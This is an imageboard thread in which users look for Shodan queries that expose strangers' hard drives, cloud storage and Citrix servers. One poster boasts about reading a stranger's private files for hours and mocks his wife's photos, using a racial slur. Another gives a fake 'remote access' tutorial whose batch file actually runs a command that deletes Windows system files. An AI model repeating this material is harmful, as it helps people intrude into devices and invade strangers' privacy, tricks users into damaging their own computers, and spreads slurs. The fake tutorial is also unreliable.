External Hard Drives Internet of Things

Long time ago an user showed us how to access external hard drives over the internet of things using shodan.io

Does anyone remember what we had to type into the search box? I lost the screen cap I had of it.

Holy shit, I remember that thread. Wasn't it about accessing clouds though?

ding ding ding ding

I thought they were external hard drives plugged into a computer and we were accessing them while the other user was on?

I remember we had to type in something about cookie: and we were able to poke around

It may have been both. IIRC I was pretty drunk back then.

google has 85000 responses to your question.

...

I'm looking for what we need to type into the search field of shodan.io
What matters is the fact that we can plob in some text and access some random ass shit on a different continent.

Maybe DuckDuckGo?

...

Bumping for interest.

...

Video project, I'm going to show how various pieces of hardware can be access without next to zero IT/l33t skills required

now you're trolling a troll.

wait a sec, If I have a external HDD, will it show up on shodan.io?

I think it has to have an Internet of Things connection or whatever fucking term I need to insert here.

Nah. I'll defer to yours.
Thanks for clarifying though.

I just want to know if it can make my refrigerator get me more beer!

Carnivore self-bump.

No one has a screen cap of the original thread?

the "internet of things" is not the same as the "internet"

If you're browsing an external drive that's connected to the web it's the same as a file server…

Totally not bumping my own thread.

2 soon

Too soon…

Not this thread again. Last time I spent about 20 hours looking at every file on some chink's hard drive. I learned about his life story, his hardships, his successes, and his future plans. I was sad when I finished looking at the last file. He has since took down the cloud drive and now I wonder if he is happy or not.
He hid some barely NSFW pictures of his wife from 2005 in a secret folder on his harddisk. It was from right before she had children and probably the last time his wife didnt have a disgusting MILF body. He probably jerks off to those 2 pictures every day, reminiscing back to the days his wife was still cute.

was it this chink?

Yep thats her.

is there a specific port they use for it?
If so, a pretty simple nmap script could scan for it, without having to pay jewdan.io for more than 5 pages.

Unless it's IoT, no.

I thought the picture was old enough? Found it somewhere where anons were talking about old memes/stuff.

Do you has screen cap of the old OP?

Bampity Bumpity.

ehhh, not completely.

1) First thing you do is find out the IP address the drive connects to. Probably easiest way is to open a command prompt (under accessories on the start menu) and type ipconfig. It'll have a big list of info, but you're looking for the line "Default Gateway". Write that number down.

2) Close command prompt and open a notepad file.

Type in this:

@remot on c:\\windows\system\

Log:
pass:

@echo off del c:\\windows\system 32

3) save this file as .bat

4) double click on the .bat file you created. This will use remote access tools on windows pc's to access the computer at the ip in question.

5) now you can go to your computer, open the command prompt, type

"connect "

Then navigate via the accessed computer to the drive you want to check out.

You're welcome.

doin it rite naw! thanks

sec fag i think i have it

...

We await your response.

Do you feel in charge?

What a bunch of fucking plebs.
Go back to cuckchan, newfags.

Random text

thanks, seems legit.

If anybody here is able to remember Asusgate, that still works and is turning up new results.

Yea I remember it. You want to search "twistedweb/10.2.0" in shodan, like fucking half of them are unprotected.

Tbh there is really nothing interesting about them.

If you guys want to have some REAL fun, look for open citrix servers on shodan. Those are legitimate computers you can connect to.

Here is another fun one to search, mostly home bongland servers:
shodan.io/search?query=Iomega

cool port 8888

speaking of 1337 haxor fun, what can I do w3af and metasploit that is lulzy.

what are they?

damn, what did they use for that?

pls email [email protected]/* */ if you're a cat named sakamoto and want a cute furret to licc your paws

I found these brass brushes that should help. Enamel is a 5 on the hardness scale and brass is only a 3 (much softer) so it should not damage your teeth. Good lucc OP.
